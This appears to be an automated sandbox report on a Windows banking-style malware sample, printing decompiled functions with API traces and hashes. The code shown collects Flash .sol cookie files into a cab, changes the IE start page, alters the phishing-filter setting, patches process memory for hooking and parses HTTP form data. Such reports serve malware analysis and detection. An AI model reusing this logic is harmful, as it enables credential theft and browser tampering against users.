					if(_a4 == 0) {
						_t8 = E004135EC(1, _t16, _t17,  &_v528, L"mfplayer_cfg.cab");
					} else {
						_t16 =  &_v528;
						_t8 = E0040B844( &_v528, L"*.sol");
					}
				}
				if(_a4 != 0) {
					return _t8;
				} else {
					return E00404EA2(_t16, 0, 2, 0);
				}
			}







        0x004053d8
        0x004053e0
        0x004053ef
        0x004053f8
        0x0040541b
        0x004053fa
        0x004053ff
        0x00405405
        0x00405405
        0x004053f8
        0x00405423
        0x00405432
        0x00405425
        0x00000000
        0x0040542a

        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 004053D8
        • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 004053EF
          • Part of subcall function 0040B844: PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040B867
          • Part of subcall function 0040B844: FindFirstFileW.KERNEL32(?,?), ref: 0040B87A
          • Part of subcall function 0040B844: PathMatchSpecW.SHLWAPI(?,?), ref: 0040B8C5
          • Part of subcall function 0040B844: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040B8DD
          • Part of subcall function 0040B844: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040B918
          • Part of subcall function 0040B844: FindClose.KERNEL32(00000000), ref: 0040B927
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
        • String ID: *.sol$Macromedia\Flash Player$mfplayer_cfg.cab
        • API String ID: 304139136-2957579075
        • Opcode ID: 03e64951854c02a268a9139ad083975156b01422f1e6610cdd9a0e8f38360a93
        • Instruction ID: b142cbbd483e0d5c6abda0a69839733cb4f7b9459a201d1bc40bf6e107500214
        • Opcode Fuzzy Hash: 03e64951854c02a268a9139ad083975156b01422f1e6610cdd9a0e8f38360a93
        • Instruction Fuzzy Hash: 42F022F26002083AE700EB619C89FEB372CC784309F60C073B610B61C2D678DD888A68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00408668, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36registryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00408668(void* __ecx, char* _a4, int _a8) {
				void* _v8;
				int _t13;

				_t13 = 0;
				_v8 = 0x80000001;
				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
						_t13 = 1;
					}
					RegCloseKey(_v8);
				}
				return _t13;
			}





        0x0040866d
        0x00408685
        0x00408690
        0x004086ab
        0x004086ad
        0x004086ad
        0x004086b2
        0x004086b2
        0x004086bc

        APIs
        • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,?,?,004059B0,00000001,00000000,00000001), ref: 00408688
        • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,004059B0,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 004086A3
        • RegCloseKey.ADVAPI32(?,?,?,004059B0,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 004086B2
        Strings
        • Start Page, xrefs: 0040869B
        • software\microsoft\internet explorer\main, xrefs: 0040867F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateValue
        • String ID: Start Page$software\microsoft\internet explorer\main
        • API String ID: 1818849710-2333123338
        • Opcode ID: 3f72b508191d2304732dd8c00b647a79f35cce80c374dd2a500c706903c49bbe
        • Instruction ID: a5947eacba37599ba9e3f55c47b65635f87dd7317843f3ddb3d56d3abedb189c
        • Opcode Fuzzy Hash: 3f72b508191d2304732dd8c00b647a79f35cce80c374dd2a500c706903c49bbe
        • Instruction Fuzzy Hash: 8FF08971250108BFEF105FD0CD8AFDF766DEB10784F104035B505B21A0D6769E109624
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004122A7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33registryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E004122A7(void* _a4, short* _a8, char* _a12) {
				int _t12;

				_t12 = 0;
				if(RegCreateKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 0, 0, 2, 0,  &_a4, 0) == 0) {
					if(RegSetValueExW(_a4, _a8, 0, 4, _a12, 4) == 0) {
						_t12 = 1;
					}
					RegCloseKey(_a4);
				}
				return _t12;
			}




        0x004122ab
        0x004122c8
        0x004122e0
        0x004122e2
        0x004122e2
        0x004122e7
        0x004122e7
        0x004122f1

        APIs
        • RegCreateKeyExW.ADVAPI32(?,software\microsoft\internet explorer\phishingfilter,00000000,00000000,00000000,00000002,00000000,?,00000000,Enabled,?,00412258,?,?,00000000), ref: 004122C0
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00412258,?,?,00000000,?,?,0040D7D7,80000002,EnabledV8), ref: 004122D8
        • RegCloseKey.ADVAPI32(?,?,00412258,?,?,00000000,?,?,0040D7D7,80000002,EnabledV8,80000002,EnabledV8,80000002,Enabled,80000001), ref: 004122E7
        Strings
        • Enabled, xrefs: 004122AA
        • software\microsoft\internet explorer\phishingfilter, xrefs: 004122B8
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateValue
        • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
        • API String ID: 1818849710-3174912645
        • Opcode ID: 68322bd4febd3306fe28399a910b0fe9c06c88d45e15e5f5d4d0d542dff15977
        • Instruction ID: c8f73b408be23a5dc62d321a3c3244782e8ebee6fee6495011d806c5bec288ba
        • Opcode Fuzzy Hash: 68322bd4febd3306fe28399a910b0fe9c06c88d45e15e5f5d4d0d542dff15977
        • Instruction Fuzzy Hash: DDF0A5B524420CBFEB114F90DC85FEB7B6DEB50798F108026BA04991A0D272AD60AA68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0041225C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0041225C(void* _a4, short* _a8, int* _a12, char* _a16, int* _a20) {
				int _t14;

				_t14 = 0;
				if(RegOpenKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 1,  &_a4) == 0) {
					if(RegQueryValueExW(_a4, _a8, 0, _a12, _a16, _a20) == 0) {
						_t14 = 1;
					}
					RegCloseKey(_a4);
				}
				return _t14;
			}




        0x00412266
        0x00412279
        0x00412293
        0x00412295
        0x00412295
        0x0041229a
        0x0041229a
        0x004122a4

        APIs
        • RegOpenKeyExW.ADVAPI32(00000004,software\microsoft\internet explorer\phishingfilter,00000000,00000001,00000004,Enabled,?,00412226,00000004,?,?,00000000,?), ref: 00412271
        • RegQueryValueExW.ADVAPI32(00000004,?,00000000,?,80000001,0040D78C,?,00412226,00000004,?,?,00000000,?), ref: 0041228B
        • RegCloseKey.ADVAPI32(00000004,?,00412226,00000004,?,?,00000000,?,?,?,?,0040D78C,80000001,Enabled), ref: 0041229A
        Strings
        • Enabled, xrefs: 0041225F
        • software\microsoft\internet explorer\phishingfilter, xrefs: 00412269
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseOpenQueryValue
        • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
        • API String ID: 3677997916-3174912645
        • Opcode ID: 49bde7066094ab12d5290b1cc3877c700f64e363c7f4393a1bdae24fc6e55d01
        • Instruction ID: 21bf141f7b662de0dc43bcf15fd1b0b59a1b42d884064bc964c9240f03a19c96
        • Opcode Fuzzy Hash: 49bde7066094ab12d5290b1cc3877c700f64e363c7f4393a1bdae24fc6e55d01
        • Instruction Fuzzy Hash: B3F0A57224410DBFEF014F91DC85FEA3F2DEB54784F008026FA0995560D772E9A1AB68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407949, Relevance: 7.6, APIs: 5, Instructions: 100COMMON
        Download Yara Rule
        C-Code - Quality: 98%
        			E00407949(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
				long _v8;
				void* __edi;
				intOrPtr* _t24;
				intOrPtr _t25;
				signed short _t26;
				int _t27;
				signed short _t28;
				intOrPtr* _t29;
				signed short _t31;
				int _t32;
				signed short _t34;
				signed short _t37;
				void* _t42;
				signed int _t48;
				void* _t57;

				_t48 = __edx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t24 = _a8;
				if(_a16 != 2) {
					_t25 =  *_t24;
				} else {
					_t25 =  *((intOrPtr*)(_t24 + 0x10));
				}
				if(_t25 != 0) {
					_t42 = _t25 + _a4;
					_t26 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t26;
					if(_t26 == 0) {
						while(1) {
							_t31 =  *_t42;
							__eflags = _t31;
							if(_t31 == 0) {
								break;
							}
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								__eflags = _a16;
								if(_a16 != 0) {
									__eflags = _a16 - 1;
									if(_a16 != 1) {
										goto L18;
									} else {
										__eflags = _t31;
										if(_t31 < 0) {
											goto L18;
										} else {
											_t57 = _t31 + _a4;
											_t34 = VirtualProtectEx( *0x414ad0, _t57, 4, 0x40,  &_v8);
											__eflags = _t34;
											if(_t34 == 0) {
												goto L18;
											} else {
												_t17 = _t57 + 2; // 0x4144e2
												_t48 = _t48 | 0xffffffff;
												_t37 = E0040F65D(_t48, _a12, _t48, _t17);
												VirtualProtectEx( *0x414ad0, _t57, 4, _v8,  &_v8);
												__eflags = _t37;
												goto L17;
											}
										}
									}
								} else {
									__eflags = _t31;
									if(_t31 >= 0) {
										goto L18;
									} else {
										__eflags = _a12 - (_t31 & 0x0000ffff);
										goto L17;
									}
								}
							} else {
								__eflags = _t31 - _a12;
								L17:
								if(__eflags != 0) {
									L18:
									_t42 = _t42 + 4;
									_t32 = IsBadHugeReadPtr(_t42, 4);
									__eflags = _t32;
									if(_t32 == 0) {
										continue;
									}
								}
							}
							break;
						}
					}
					_t27 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t27;
					if(_t27 != 0) {
						L26:
						_t28 = 0;
						__eflags = 0;
					} else {
						__eflags =  *_t42 - _t27;
						if( *_t42 == _t27) {
							goto L26;
						} else {
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								_t29 = _a8;
								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
							} else {
								_t53 = _t42;
							}
							_t28 = E00407811(_t53,  &_a20);
						}
					}
				} else {
					_t28 = 0;
				}
				return _t28;
			}


















        0x00407949
        0x0040794c
        0x0040794d
        0x00407955
        0x00407959
        0x00407960
        0x0040795b
        0x0040795b
        0x0040795b
        0x00407964
        0x00407971
        0x00407977
        0x0040797d
        0x0040797f
        0x00407986
        0x00407986
        0x00407988
        0x0040798a
        0x00000000
        0x00000000
        0x00407990
        0x00407994
        0x0040799b
        0x0040799f
        0x004079ad
        0x004079b1
        0x00000000
        0x004079b3
        0x004079b3
        0x004079b5
        0x00000000
        0x004079b7
        0x004079ba
        0x004079cc
        0x004079d2
        0x004079d4
        0x00000000
        0x004079d6
        0x004079d9
        0x004079dc
        0x004079e2
        0x004079f9
        0x004079ff
        0x00000000
        0x004079ff
        0x004079d4
        0x004079b5
        0x004079a1
        0x004079a1
        0x004079a3
        0x00000000
        0x004079a5
        0x004079a8
        0x00000000
        0x004079a8
        0x004079a3
        0x00407996
        0x00407996
        0x00407a01
        0x00407a01
        0x00407a03
        0x00407a05
        0x00407a09
        0x00407a0f
        0x00407a11
        0x00000000
        0x00000000
        0x00407a11
        0x00407a01
        0x00000000
        0x00407994
        0x00407a17
        0x00407a1b
        0x00407a21
        0x00407a23
        0x00407a48
        0x00407a48
        0x00407a48
        0x00407a25
        0x00407a25
        0x00407a27
        0x00000000
        0x00407a29
        0x00407a29
        0x00407a2d
        0x00407a33
        0x00407a3b
        0x00407a3b
        0x00407a2f
        0x00407a2f
        0x00407a2f
        0x00407a41
        0x00407a41
        0x00407a27
        0x00407966
        0x00407966
        0x00407966
        0x00407a4d

        APIs
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407977
        • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 00407A09
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407A1B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead
        • String ID:
        • API String ID: 2080902951-0
        • Opcode ID: 356e5e9bafaf206b3497a54341e0262fef745a6cdf260c7a433ec65f0ed5853e
        • Instruction ID: 7a557ba9de92cdf11a0bc1b520e92e1cb8b68de6f9c3bdf062155dbeec040a6b
        • Opcode Fuzzy Hash: 356e5e9bafaf206b3497a54341e0262fef745a6cdf260c7a433ec65f0ed5853e
        • Instruction Fuzzy Hash: 0A3196B1B48205ABEF20CF24DC44B9B37A9AB41354F144476F901B71D1D778EA01CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00412042, Relevance: 7.6, APIs: 5, Instructions: 78sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E00412042(void* __ecx, void* __edx) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t20;
				void* _t29;
				WCHAR** _t40;

				_t40 = 0x4040bc;
				_v24 = 2;
				do {
					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
					if(_t20 == 0) {
						goto L13;
					}
					CloseHandle(_t20);
					E00411F19( *_t40, 0xb,  &_v12);
					E00411F19( *_t40, 0xc,  &_v16);
					E00411F19( *_t40, 0xd,  &_v20);
					E00411F19( *_t40, 3, 0);
					_v5 = 0;
					while(1) {
						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
						if(_t29 == 0) {
							break;
						}
						CloseHandle(_t29);
						Sleep(0x3e8);
						_v5 = _v5 + 1;
						if(_v5 < 0xa) {
							continue;
						}
						L12:
						E0040F15E(_v12);
						E0040F15E(_v16);
						_t20 = E0040F15E(_v20);
						goto L13;
					}
					if(_v12 != 0) {
						E00410093(_v12);
					}
					if(_v16 != 0) {
						E00410093(_v16);
					}
					if(_v20 != 0) {
						E00410093(_v20);
					}
					goto L12;
					L13:
					_t40 =  &(_t40[1]);
					_t18 =  &_v24;
					 *_t18 = _v24 - 1;
				} while ( *_t18 != 0);
				return _t20;
			}











        0x0041204b
        0x00412050
        0x0041205e
        0x00412062
        0x0041206a
        0x00000000
        0x00000000
        0x00412071
        0x0041207f
        0x0041208c
        0x00412099
        0x004120a3
        0x004120a8
        0x004120ab
        0x004120af
        0x004120b7
        0x00000000
        0x00000000
        0x004120ba
        0x004120c5
        0x004120cb
        0x004120d2
        0x00000000
        0x00000000
        0x004120fd
        0x00412100
        0x00412108
        0x00412110
        0x00000000
        0x00412110
        0x004120d9
        0x004120de
        0x004120de
        0x004120e6
        0x004120eb
        0x004120eb
        0x004120f3
        0x004120f8
        0x004120f8
        0x00000000
        0x00412115
        0x00412115
        0x00412118
        0x00412118
        0x00412118
        0x00412125

        APIs
        • OpenMutexW.KERNEL32(001F0001,00000000,004040BC,?,?,00000000), ref: 00412062
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00412071
          • Part of subcall function 00411F19: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,004040BC,00000000), ref: 00411F92
          • Part of subcall function 00411F19: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411FAD
          • Part of subcall function 00411F19: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FCC
          • Part of subcall function 00411F19: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FE2
          • Part of subcall function 00411F19: CloseHandle.KERNEL32(00000000), ref: 00412003
          • Part of subcall function 00411F19: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411F7A
          • Part of subcall function 00411F19: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00412025
        • OpenMutexW.KERNEL32(001F0001,00000000,004040BC,004040BC,00000003,00000000,004040BC,0000000D,?,004040BC,0000000C,00406C1F,004040BC,0000000B,?), ref: 004120AF
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004120BA
        • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 004120C5
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
        • String ID:
        • API String ID: 2066843493-0
        • Opcode ID: b24485a49a1fa779ef516574d500274133a0d83c6e4c1ce53014dc560ff307bf
        • Instruction ID: c23ad63ed52c6758965fbfe24c90ff854173a6673f5648454e666d96a8ab52b4
        • Opcode Fuzzy Hash: b24485a49a1fa779ef516574d500274133a0d83c6e4c1ce53014dc560ff307bf
        • Instruction Fuzzy Hash: 73216931900108FBDF226BA1ED45AEEBF79BF44308F10847BF240B0061D7BA4E95DA59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040BEAD, Relevance: 7.5, APIs: 5, Instructions: 45libraryloaderstringCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040BEAD(struct HINSTANCE__* __esi, WCHAR* _a4) {
				WCHAR* _t8;
				intOrPtr _t9;
				signed int _t15;
				signed char _t19;
				signed char _t20;
				void* _t21;
				struct HINSTANCE__* _t22;

				_t22 = __esi;
				if( *0x414d14 != 0) {
					L10:
					return 0;
				}
				_t8 = PathFindFileNameW(_a4);
				_t9 =  *0x414ad4; // 0x241f5a8
				if(lstrcmpiW( *(_t9 + 0x18c), _t8) != 0) {
					goto L10;
				}
				_t19 = 0;
				while(GetProcAddress(_t22,  *(0x4011ac + (_t19 & 0x000000ff) * 4)) != 0) {
					_t19 = _t19 + 1;
					if(_t19 < 4) {
						continue;
					}
					if(GetProcAddress(_t22, 5) != 0) {
						goto L10;
					}
					_t20 = 0;
					while(1) {
						_t15 = (_t20 & 0x000000ff) << 2;
						_t5 = _t15 + 0x4011bc; // 0x5
						_t6 = _t15 + 0x4011c0; // 0x14d
						if(FindResourceW(_t22,  *_t6,  *_t5) == 0) {
							goto L10;
						}
						_t20 = _t20 + 2;
						if(_t20 < 0xc) {
							continue;
						}
						E0040C598(_t21);
						 *0x414d14 = _t22;
						return 1;
					}
					goto L10;
				}
				goto L10;
			}










        0x0040bead
        0x0040beb5
        0x0040bf3c
        0x00000000
        0x0040bf3c
        0x0040bebf
        0x0040bec6
        0x0040bed9
        0x00000000
        0x00000000
        0x0040bedb
        0x0040bedd
        0x0040bef2
        0x0040bef7
        0x00000000
        0x00000000
        0x0040bf04
        0x00000000
        0x00000000
        0x0040bf06
        0x0040bf08
        0x0040bf0b
        0x0040bf0e
        0x0040bf14
        0x0040bf23
        0x00000000
        0x00000000
        0x0040bf25
        0x0040bf2b
        0x00000000
        0x00000000
        0x0040bf2d
        0x0040bf32
        0x00000000
        0x0040bf38
        0x00000000
        0x0040bf08
        0x00000000

        APIs
        • PathFindFileNameW.SHLWAPI(?,?,00405D3E,?), ref: 0040BEBF
        • lstrcmpiW.KERNEL32(?,00000000,?,00405D3E,?), ref: 0040BED1
        • GetProcAddress.KERNELBASE(?), ref: 0040BEE8
        • GetProcAddress.KERNELBASE(?,00000005), ref: 0040BEFC
        • FindResourceW.KERNEL32(?,0000014D,00000005,?,00405D3E,?), ref: 0040BF1B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressFindProc$FileNamePathResourcelstrcmpi
        • String ID:
        • API String ID: 1997813603-0
        • Opcode ID: 2e7920e833e343bd1b69625fcfc55f5100d3294579f8effddcc7be8820cef78c
        • Instruction ID: 0459f605290b404f9ab3514d4189705575a9951d8ee93359c8b5c8d98d6350a8
        • Opcode Fuzzy Hash: 2e7920e833e343bd1b69625fcfc55f5100d3294579f8effddcc7be8820cef78c
        • Instruction Fuzzy Hash: DA018F30262211AFEB101B60ED09BE73798EB56B01F15807AF104F61F1E73985119FAD
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040A9B9, Relevance: 7.5, APIs: 5, Instructions: 28synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040A9B9(void** __esi, intOrPtr _a4) {
				void* _t7;

				_t18 = __esi;
				if(__esi != 0) {
					SetEvent(__esi[1]);
					E0040AA33(_t18, _a4, 0, 0, 0, 0, 0);
					WaitForSingleObject(__esi[2], 0xffffffff);
					CloseHandle( *__esi);
					CloseHandle(__esi[1]);
					CloseHandle(__esi[2]);
					E0040F15E(__esi[4]);
					return E0040F15E(__esi);
				}
				return _t7;
			}




        0x0040a9bc
        0x0040a9be
        0x0040a9c3
        0x0040a9d2
        0x0040a9dc
        0x0040a9e4
        0x0040a9ed
        0x0040a9f6
        0x0040a9ff
        0x00000000
        0x0040aa05
        0x0040aa0b

        APIs
        • SetEvent.KERNEL32(?,00000000,0040A179,?), ref: 0040A9C3
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040A9DC
        • CloseHandle.KERNEL32(00000004), ref: 0040A9E4
        • CloseHandle.KERNEL32(?), ref: 0040A9ED
        • CloseHandle.KERNEL32(?), ref: 0040A9F6
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
        • String ID:
        • API String ID: 998100866-0
        • Opcode ID: 5d994378e7847f40d16b00a7550d1f94cd0f7806d355c205d0c7040332dee989
        • Instruction ID: da5bddd0fc5110b3fe368369576718b1227d1fb47b94fedbf0700e348707432c
        • Opcode Fuzzy Hash: 5d994378e7847f40d16b00a7550d1f94cd0f7806d355c205d0c7040332dee989
        • Instruction Fuzzy Hash: 4AE0C932504601EFCB222F65FE0988ABA72BF947113108A3AF1A6604B4CB365962DB18
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040CEFA, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 359COMMON
        Download Yara Rule
        C-Code - Quality: 92%
        			E0040CEFA(void* __edx, intOrPtr _a4, char _a7, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
				signed int _v5;
				char _v6;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t140;
				signed int _t146;
				signed short _t147;
				signed short _t148;
				signed int _t149;
				signed short _t151;
				signed char _t152;
				signed int _t153;
				signed int _t157;
				void* _t159;
				signed char _t163;
				unsigned int _t164;
				intOrPtr _t167;
				intOrPtr _t168;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t176;
				signed int _t180;
				void* _t191;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr _t202;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t219;
				signed int _t220;
				void* _t223;
				intOrPtr* _t224;
				char* _t239;
				signed int _t246;
				void* _t250;
				intOrPtr _t255;
				signed int _t256;
				signed int _t261;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				char* _t266;
				signed int _t269;
				intOrPtr* _t271;
				signed int _t273;
				void* _t274;
				void* _t275;

				_t255 = _a8;
				if( *((intOrPtr*)(_t255 + 0x41c)) < 8) {
					return 0;
				}
				_v16 = _v16 & 0x00000000;
				_t269 = E004124A2( &_v16, __edx, __eflags, _a4, 0x4e2a, 0x20000000);
				_v32 = _t269;
				_v6 = 0;
				__eflags = _t269;
				if(_t269 == 0) {
					L73:
					E0040F15E(_v32);
					return _v6;
				} else {
					__eflags = _v16 - 0x10;
					if(_v16 <= 0x10) {
						goto L73;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						__eflags = ( *_t269 & 0x0000ffff) - _v32 + _t269 - _v16;
						if(( *_t269 & 0x0000ffff) - _v32 + _t269 > _v16) {
							goto L73;
						}
						_t140 =  *(_t269 + 8) & 0x0000ffff;
						__eflags = _t140;
						if(_t140 == 0) {
							L13:
							_t269 = _t269 + ( *_t269 & 0x0000ffff);
							__eflags = _t269 - _v32 + 0x10 - _v16;
							if(_t269 - _v32 + 0x10 < _v16) {
								continue;
							}
							goto L73;
						}
						_v12 = (_t140 & 0x0000ffff) + _t269;
						_v24 = E0040F637((_t140 & 0x0000ffff) + _t269);
						_t146 = E0040A3D4((_t140 & 0x0000ffff) + _t269, _t145, _t255,  *((intOrPtr*)(_t255 + 0x400)), 0, 0, 0);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L13;
						}
						_t147 =  *(_t269 + 0xa) & 0x0000ffff;
						__eflags = _t147;
						if(_t147 == 0) {
							L9:
							_t148 =  *(_t269 + 0xc) & 0x0000ffff;
							__eflags = _t148;
							if(_t148 == 0) {
								L15:
								__eflags =  *((char*)(_t269 + 6)) - 9;
								if( *((char*)(_t269 + 6)) > 9) {
									 *((char*)(_t269 + 6)) = 0;
								}
								__eflags =  *(_t269 + 4);
								if( *(_t269 + 4) == 0) {
									 *(_t269 + 4) = 1;
								}
								_t149 =  *((intOrPtr*)(_t269 + 6));
								_v5 = _t149;
								__eflags = _t149;
								if(_t149 == 0) {
									_v5 = 6;
								}
								_t256 =  *(_t255 + 0x418);
								_t219 =  *((intOrPtr*)(_a8 + 0x41c)) + _t256;
								_v20 = _v20 & 0x00000000;
								_t244 = _t256;
								while(1) {
									__eflags = _t256 - _t219;
									if(_t256 >= _t219) {
										break;
									}
									__eflags =  *_t256 - 0x3d;
									if( *_t256 != 0x3d) {
										L40:
										_t256 = _t256 + 1;
										__eflags = _t256;
										continue;
									}
									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
									_a7 = 0;
									__eflags = _t151;
									if(_t151 != 0) {
										_t208 = E0040A3D4((_t151 & 0x0000ffff) + _t269, E0040F637((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
										__eflags = _t208;
										if(_t208 == 0) {
											_a7 = 1;
										}
									}
									_t152 =  *((intOrPtr*)(_t269 + 5));
									__eflags = _t152;
									if(_t152 != 0) {
										_v20 = _v20 + 1;
										__eflags = (_t152 & 0x000000ff) - _v20;
										if((_t152 & 0x000000ff) != _v20) {
											_t44 =  &_a7;
											 *_t44 = _a7 + 1;
											__eflags =  *_t44;
										}
									}
									_t153 = _t256;
									_v28 = _t256;
									while(1) {
										__eflags = _t153 - _t219;
										if(_t153 >= _t219) {
											break;
										}
										_t153 = _t153 + 1;
										__eflags =  *_t153 - 0x26;
										_v28 = _t153;
										if( *_t153 != 0x26) {
											continue;
										}
										break;
									}
									__eflags = _a7;
									if(_a7 != 0) {
										L39:
										_t244 = _v28 + 1;
										__eflags = _v28 + 1;
										goto L40;
									}
									_t246 = _v5 & 0x000000ff;
									__eflags = _t153 - _t256 - 1 - _t246;
									if(_t153 - _t256 - 1 != _t246) {
										goto L39;
									}
									_t223 = 0;
									__eflags = _t246;
									if(_t246 <= 0) {
										L38:
										_t157 = E004101CA( &_v68, _v12, _v24);
										__eflags = _t157;
										if(_t157 != 0) {
											_t220 = _v5 & 0x000000ff;
											_v36 = _t256 + 1;
											_t159 = E0040F19A( &_v52, _t256 + 1, _t220);
											 *((char*)(_t275 + _t220 - 0x30)) = 0;
											_v28 = E0040F3F1(_t159, _t223);
											_v20 = 0;
											_t163 = E004089BF( &_v20, _t223, 0,  &_v68);
											_v12 = _t163;
											_v24 = 0;
											__eflags = _t163 & 0x00000003;
											if((_t163 & 0x00000003) != 0) {
												_v12 = 0;
											}
											_t224 = _v20;
											_t164 = 4;
											__eflags = _v12 - _t164;
											if(_v12 < _t164) {
												_v12 = _t164;
											} else {
